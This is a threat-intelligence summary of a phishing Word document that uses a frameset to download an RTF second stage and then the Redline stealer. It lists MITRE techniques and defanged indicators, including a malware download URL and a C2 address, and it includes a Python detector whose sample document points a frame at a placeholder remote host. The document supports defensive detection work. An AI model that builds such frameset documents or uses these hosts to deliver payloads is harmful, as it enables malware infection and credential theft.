Malicious Word Document with a Frameset

A Word OOXML document (docx) is used as a downloader by embedding a frameset that loads a second-stage payload when opened. The phishing sample “Order Confirmation 22839.docx” first delivers a malicious RTF (“92.doc”) which downloads the final malware, the Redline stealer, from a remote URL and then communicates with a C2 server. #RedlineStealer #CVE-2022-30190

Keypoints

  • A new downloader technique uses Word OOXML framesets to pull in a second-stage payload from an external source.
  • The frameset is defined in webSettings.xml and references an external file via an rId relationship.
  • The phishing document is named “Order Confirmation 22839.docx” and has a recorded SHA-256 hash.
  • The second-stage payload (“92.doc”) is a malicious RTF document that then downloads the real malware from a remote URL.
  • The final payload is the Redline stealer, identified by its SHA-256 hash and a dedicated C2 server.
  • Word OOXML ZIP container manipulation enables the frameset-based delivery without embedding obvious malicious code.
  • The report cites ISC SANS as the source and provides several hashes and network indicators for detection.
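
The webSettings.xml frameset and its rId relationship described above can be checked mechanically. The following is an added example, not code from the ISC diary: it unpacks a docx (a plain ZIP), finds every <w:frame> whose <w:sourceFileName r:id="..."/> resolves to a relationship with TargetMode="External" in word/_rels/webSettings.xml.rels, and reports the target. The sample document is constructed in-memory, and the frame URL in it is a placeholder, not the campaign's.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"
R = "{http://schemas.openxmlformats.org/officeDocument/2006/relationships}"
PKG = "{http://schemas.openxmlformats.org/package/2006/relationships}"

def external_frame_targets(docx_bytes):
    """Return (rId, target) for every frame whose source is an External relationship."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        names = set(z.namelist())
        if "word/webSettings.xml" not in names:
            return hits  # no web settings part, so no frameset to inspect
        settings = ET.fromstring(z.read("word/webSettings.xml"))
        rels = {}
        if "word/_rels/webSettings.xml.rels" in names:
            for rel in ET.fromstring(z.read("word/_rels/webSettings.xml.rels")).iter(PKG + "Relationship"):
                rels[rel.get("Id")] = (rel.get("Target"), rel.get("TargetMode"))
        # Each <w:frame> names its content with <w:sourceFileName r:id="..."/>; when
        # that rId resolves to an External relationship, Word fetches the file remotely.
        for src in settings.iter(W + "sourceFileName"):
            target, mode = rels.get(src.get(R + "id"), (None, None))
            if mode == "External":
                hits.append((src.get(R + "id"), target))
    return hits

def build_sample(target_mode="External"):
    """Constructed minimal docx reproducing the frameset layout; the URL is a placeholder."""
    web_settings = (
        f'<w:webSettings xmlns:w="{W[1:-1]}" xmlns:r="{R[1:-1]}"><w:frameset><w:frameset>'
        '<w:frame><w:name w:val="main"/><w:sourceFileName r:id="rId1"/></w:frame>'
        "</w:frameset></w:frameset></w:webSettings>"
    )
    rels = (
        f'<Relationships xmlns="{PKG[1:-1]}"><Relationship Id="rId1" Target="http://frameset.example/92.doc" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" '
        f'TargetMode="{target_mode}"/></Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/webSettings.xml", web_settings)
        z.writestr("word/_rels/webSettings.xml.rels", rels)
    return buf.getvalue()

if __name__ == "__main__":
    for rid, target in external_frame_targets(build_sample()):
        print(f"frame {rid} loads an external file: {target}")
```

Run the same function over a real docx by passing the file's bytes; an internal (non-External) frame relationship is not reported.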

MITRE Techniques

  • [T1566.001] Phishing: Attachment – The document is delivered via a phishing campaign and named “Order Confirmation 22839.docx.” – “delivered via phishing campaign and called ‘Order Confirmation 22839.docx’…”
  • [T1204.002] User Execution: Malicious File – The payload is downloaded after minimal user interaction; the only visible sign is a popup. – “…payload will be automatically downloaded with interaction with the user. Just a popup will be displayed.”
  • [T1105] Ingress Tool Transfer – The second-stage payload (“92.doc”) downloads the real malware from the remote URL. – “It downloads the real malware from the following URL: hxxp://107[.]172[.]44[.]187/92/vbc.exe”
  • [T1071.001] Web Protocols – The final malware (Redline stealer) communicates with a C2 server. – “The malware is a Redline stealer … talking to the following C2 server: 171[.]22[.]30[.]129:54686”

Indicators of Compromise

  • [File name] Order Confirmation 22839.docx – context: phishing document used as the lure
  • [File name] 92.doc – context: second-stage payload (malicious RTF) referenced by the frameset
  • [URL] hxxp://107[.]172[.]44[.]187/92/vbc.exe – context: URL used to download the final malware
  • [IP] 171[.]22[.]30[.]129:54686 – context: Redline stealer C2 server
  • [SHA256] 2382d4957569aed12896aa8ca2cc9d2698217e53c9ab5d52799e4ea0920aa9b9 – context: SHA256 of the Order Confirmation 22839.docx
  • [SHA256] 7d2b174c017d61fcd94673c55f730821fbc30d7cf03fb493563a122d73466aab – context: SHA256 of the Redline stealer

Read more: https://isc.sans.edu/diary/rss/29052